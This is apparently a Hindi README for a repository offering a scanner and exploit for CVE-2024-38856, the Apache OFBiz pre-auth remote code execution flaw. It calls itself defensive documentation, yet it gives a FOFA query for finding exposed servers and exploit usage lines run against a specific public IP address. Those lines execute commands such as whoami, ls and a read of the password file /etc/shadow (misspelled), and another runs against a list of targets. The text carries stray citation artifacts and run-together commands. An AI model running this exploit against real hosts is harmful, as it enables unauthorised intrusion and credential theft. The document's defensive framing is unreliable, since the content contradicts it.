
CVE-2024-38856: Apache OFBiz दूरस्थ कोड निष्पादन स्कैनर और शोषण
रिपॉजिटरी उद्देश्य: CVE-2024-38856 (Apache OFBiz incorrect-authorization / pre-auth RCE) के बारे में सूचनात्मक दस्तावेज़ीकरण।
यह रिपॉजिटरी हथियारबंद एक्सप्लॉइट कोड नहीं रखता है। यह केवल रक्षात्मक अनुसंधान, पैचिंग मार्गदर्शन, पता लगाना, और सुरक्षित प्रयोगशाला परीक्षण के लिए है।
CVE-2024-38856 Apache OFBiz में एक incorrect-authorization भेद्यता है जो कुछ एंडपॉइंट्स तक अप्रमाणित पहुंच की अनुमति दे सकती है और विशिष्ट परिस्थितियों में, स्क्रीन रेंडरिंग कोड के निष्पादन को सक्षम कर सकती है, जो प्रभावित सिस्टम पर रिमोट कोड निष्पादन का कारण बन सकती है। यह मुद्दा Apache OFBiz 18.12.15 में ठीक किया गया था; 18.12.14 तक के पिछले रिलीज़ प्रभावित हैं। :contentReference[oaicite:0]{index=0}
गंभीरता / प्रभाव: कई सुरक्षा विक्रेताओं और शोधकर्ताओं ने इस भेद्यता को गंभीर (critical) रेट किया है — यह कमजोर इंस्टेंस पर अप्रमाणित रिमोट कोड निष्पादन का कारण बन सकती है, और इसे जंगल में सक्रिय शोषण प्रयासों में देखा गया है। प्रशासकों को उजागर OFBiz इंस्टेंस को उच्च-प्राथमिकता वाले सुधार आइटम के रूप में मानना चाहिए। :contentReference[oaicite:1]{index=1}
fofa : app="Apache_OFBiz" && port="8443"
git clone https://github.com/Hex00-0x4/CVE-2024-38856-Apache-OFBiz.gitcd CVE-2024-38856-Apache-OFBiz└─$ python3 apache_bang.py --target https://139.5.191.156 --port 8443 --exploit -c "whoami"└─$ python3 apache_bang.py --target https://139.5.191.156 --port 8443 --exploit -c "ifconfig"└─$ python3 apache_bang.py --target https://139.5.191.156 --port 8443 --exploit -c "ls"└─$ python3 apache_bang.py --target https://139.5.191.156 --port 8443 --exploit -c "cat /etc/shodow"
─$ python3 apache_bang.py --file target.txt -c "ls"